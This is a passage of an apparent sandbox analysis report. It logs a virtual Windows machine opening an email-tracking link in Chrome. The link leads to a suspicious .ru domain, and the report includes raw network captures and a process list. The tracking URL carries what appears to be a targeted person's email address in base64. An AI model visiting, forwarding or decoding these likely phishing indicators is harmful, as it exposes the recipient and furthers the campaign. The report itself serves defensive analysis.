                            2024-08-13 19:58:15 UTC58INData Raw: 4d 53 2d 43 56 3a 20 51 71 72 63 41 54 53 33 4e 45 53 6b 4f 58 67 46 57 66 41 78 77 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                            Data Ascii: MS-CV: QqrcATS3NESkOXgFWfAxww.0Payload parsing failed.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            39192.168.2.65920135.190.80.14432448C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-08-13 19:58:38 UTC537OUTOPTIONS /report/v4?s=NuCLcwhOH3BOSV4nEUqHvLvT7sEbfMdKfU7%2FSp6%2BDXheB4JDRANpTyuGrG3v93XXhgQIVATEgSL3nX6YKbfCI6y%2B4ItNsuych36cIF4KjZrnPIhFU9Xmams0MF3hDj08jg%3D%3D HTTP/1.1
                            Host: a.nel.cloudflare.com
                            Connection: keep-alive
                            Origin: https://bytebloomoe.ru
                            Access-Control-Request-Method: POST
                            Access-Control-Request-Headers: content-type
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-08-13 19:58:38 UTC336INHTTP/1.1 200 OK
                            Content-Length: 0
                            access-control-max-age: 86400
                            access-control-allow-methods: OPTIONS, POST
                            access-control-allow-origin: *
                            access-control-allow-headers: content-length, content-type
                            date: Tue, 13 Aug 2024 19:58:38 GMT
                            Via: 1.1 google
                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                            Connection: close


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            40192.168.2.65920235.190.80.14432448C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-08-13 19:58:38 UTC480OUTPOST /report/v4?s=NuCLcwhOH3BOSV4nEUqHvLvT7sEbfMdKfU7%2FSp6%2BDXheB4JDRANpTyuGrG3v93XXhgQIVATEgSL3nX6YKbfCI6y%2B4ItNsuych36cIF4KjZrnPIhFU9Xmams0MF3hDj08jg%3D%3D HTTP/1.1
                            Host: a.nel.cloudflare.com
                            Connection: keep-alive
                            Content-Length: 424
                            Content-Type: application/reports+json
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-08-13 19:58:38 UTC424OUTData Raw: 5b 7b 22 61 67 65 22 3a 33 32 32 32 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 32 37 30 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 62 79 74 65 62 6c 6f 6f 6d 6f 65 2e 72 75 2f 38 51 6e 57 58 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 38 31 2e 32 30 37 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72
                            Data Ascii: [{"age":32220,"body":{"elapsed_time":270,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://bytebloomoe.ru/8QnWX/","sampling_fraction":1.0,"server_ip":"104.21.81.207","status_code":404,"type":"http.error"},"type":"network-error
                            2024-08-13 19:58:38 UTC168INHTTP/1.1 200 OK
                            Content-Length: 0
                            date: Tue, 13 Aug 2024 19:58:38 GMT
                            Via: 1.1 google
                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                            Connection: close


                            Session IDSource IPSource PortDestination IPDestination Port
                            41192.168.2.65920340.115.3.253443
                            TimestampBytes transferredDirectionData
                            2024-08-13 19:58:41 UTC70OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 34 0d 0a 4d 53 2d 43 56 3a 20 38 42 45 34 34 36 66 6b 4d 6b 36 59 79 4f 6b 6b 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 64 31 65 62 62 39 33 33 31 37 32 63 63 30 0d 0a 0d 0a
                            Data Ascii: CNT 1 CON 304MS-CV: 8BE446fkMk6YyOkk.1Context: bd1ebb933172cc0
                            2024-08-13 19:58:41 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                            2024-08-13 19:58:41 UTC1083OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 30 0d 0a 4d 53 2d 43 56 3a 20 38 42 45 34 34 36 66 6b 4d 6b 36 59 79 4f 6b 6b 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 64 31 65 62 62 39 33 33 31 37 32 63 63 30 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 59 31 67 2b 44 4d 34 44 4f 4f 42 33 59 71 2f 7a 62 35 46 4c 52 65 64 4e 64 44 6d 68 57 75 61 74 63 43 32 73 30 34 57 75 4e 6f 47 4f 75 73 51 4f 47 65 55 38 53 58 6f 47 31 45 52 74 41 77 4f 76 79 2b 50 66 74 4d 36 65 76 49 52 6e 4f 6b 63 48 47 56 38 38 7a 51 55 36 59 4a 58 6c 50 67 33 6c 46 70 47 6e 44 6d 67 61 77 75 4a 4b 63 35
                            Data Ascii: ATH 2 CON\DEVICE 1060MS-CV: 8BE446fkMk6YyOkk.2Context: bd1ebb933172cc0<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAY1g+DM4DOOB3Yq/zb5FLRedNdDmhWuatcC2s04WuNoGOusQOGeU8SXoG1ERtAwOvy+PftM6evIRnOkcHGV88zQU6YJXlPg3lFpGnDmgawuJKc5
                            2024-08-13 19:58:41 UTC217OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 36 0d 0a 4d 53 2d 43 56 3a 20 38 42 45 34 34 36 66 6b 4d 6b 36 59 79 4f 6b 6b 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 64 31 65 62 62 39 33 33 31 37 32 63 63 30 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                            Data Ascii: BND 3 CON\WNS 0 196MS-CV: 8BE446fkMk6YyOkk.3Context: bd1ebb933172cc0<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                            2024-08-13 19:58:41 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                            Data Ascii: 202 1 CON 58
                            2024-08-13 19:58:41 UTC58INData Raw: 4d 53 2d 43 56 3a 20 38 4d 59 4b 6f 52 58 33 68 6b 71 70 64 4c 68 50 78 38 33 30 38 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                            Data Ascii: MS-CV: 8MYKoRX3hkqpdLhPx8308w.0Payload parsing failed.


                            Click to jump to process

                            Click to jump to process

                            Click to jump to process

                            Target ID:0
                            Start time:15:57:21
                            Start date:13/08/2024
                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                            Imagebase:0x7ff684c40000
                            File size:3'242'272 bytes
                            MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:false

                            Target ID:2
                            Start time:15:57:25
                            Start date:13/08/2024
                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1728 --field-trial-handle=2064,i,17365023842591099660,13906610943497592802,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                            Imagebase:0x7ff684c40000
                            File size:3'242'272 bytes
                            MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:false

                            Target ID:3
                            Start time:15:57:28
                            Start date:13/08/2024
                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://clicks.aweber.com/y/ct/?l=1Lr_k&m=h9RNUFV_ixtHDTP&b=0la683CmRD4xZfKbroa5Lg#McGF0dGkucGFzc21vcmVAZmlyc3RvbnRhcmlvLmNvbQ=="
                            Imagebase:0x7ff684c40000
                            File size:3'242'272 bytes
                            MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:true

                            No disassembly